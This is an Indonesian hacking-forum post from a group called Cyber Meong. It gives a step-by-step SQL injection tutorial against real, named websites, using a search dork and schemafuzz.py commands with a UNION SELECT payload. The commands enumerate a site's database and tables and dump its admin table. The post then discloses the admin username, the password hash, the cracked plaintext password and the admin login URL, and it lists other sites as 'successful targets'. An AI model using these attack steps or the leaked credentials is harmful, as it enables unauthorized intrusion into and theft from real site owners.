hohoho met pagi, mau share lagi nih :D
trik lama yang dah ga asing lagi, tapi masih ampuh,
akan di jelaskan ala meong :P

tutorial berbentuk video, durasi 12 menit, size kira2x 40 mb

silahkan download sendiri, liat sendiri, tapi jangan ampe coli yak =))=))=))

Download Video

http://www.youtube.com/watch?v=9WVWzuPR6HE

Target Succsess

http://www.enabledart.co.uk/

http://www.ddpayroll.co.uk

http://ddenterprise.co.uk/viewnews.php?id=5

http://www.chores4you.co.uk/

kalo dah nonton video nya, silahkan temen2x lanjut kan disini :D

hatur nuhun

========UPDATE=======

buat yang males buffer, saya coba untuk menyertakan penjelasannya disini

untuk tutorial berikut, saya pakai terminal linux lucid linx, cara kerja nya sama saja dengan memakai command prompt di windows, hanya saja bedanya di awal console kita menambahkan "python" (tanpa tanda kutip). cekibrot ....

target ->> http://www.annexpower.com/news_detail.php?newsid=1

dork ->> inurl:news_detail.php?newsid=


pada trik yang di video, saya letakkan schemafuzz.py nya di partisi F: , sedangkan di trik ini, saya letakkan file schemafuzz.py nya di home folder, (bukan di root)...



sehingga perintah nya adalah

python schemafuzz.py -u http://www.annexpower.com/news_detail.php?newsid=1 --findcol


screenshoot



dan enter, sehingga proses pencarian column seperti screenshoot



dan hasilnya adalah seperti screenshoot



lihat bagian yang saya block, copas url dari darkc0de tersebut
kemudian gunakan perintah --dbs untuk mencari databasenya.


python schemafuzz.py -u http://www.annexpower.com/news_detail.php?newsid=1+AND+1=2+UNION+SELECT+0,1,2,3,4,5,darkc0de,7,8,9,10,11 --dbs


seperti screenshoot



setelah proses selesai, seperti screenshoot di bawah ini



lihat bagian yang saya block, itu adalah databasenya ->> annexpower

sekarang kita cari apa aja sih yang ada di dalam databasenya, dengan perintah --schema -D annexpower


python schemafuzz.py -u http://www.annexpower.com/news_detail.php?newsid=1+AND+1=2+UNION+SELECT+0,1,2,3,4,5,darkc0de,7,8,9,10,11 --schema -D annexpower


seperti screenshoot



setelah proses, seperti screenshoot di bawah



an_tblofficer ->> tablenya, | OfficerID,Login,Password ->> column nya


sekarang kita dump, untuk mengetahui login dan password. dengan perintah

python schemafuzz.py -u http://www.annexpower.com/news_detail.php?newsid=1+AND+1=2+UNION+SELECT+0,1,2,3,4,5,darkc0de,7,8,9,10,11 --dump -D annexpower -T an_tblofficer -C OfficerID,Login,Password




gotcha !!!



perhatikan yang saya block

admin:17fd381ae03c2789bf5881913027519b


admin ->> login | 17fd381ae03c2789bf5881913027519b ->> password

tapi sebelumnya passwordnya harus di decrypt dulu, make md5hash decrypter, di google banyak :D

sssttt !!! passwordnya Consider1 :P



selanjutnya masuk ke http://www.annexpower.com/admin/login.php

dan masukkan user dan password yang sudah kita dapetin tadi

hasilnya, taraaaaa ....



sengaja web nya ga saya depes, soalnya nenek saya pesan, kalo mengganggu hak milik orang lain itu dosa, kecuali masuk doang. . .wakakakaka =)) :P

ok deh, sekian dulu, ntar di update lagi kalo ada yang baru, Keep Visit www.cyber-meong.net




YIE Cyber Meong Team

CYBER MEONG v1.6 Beta © 2013 - Contact us
Template by Urangkurai | Edited by -NMS- (CM Team)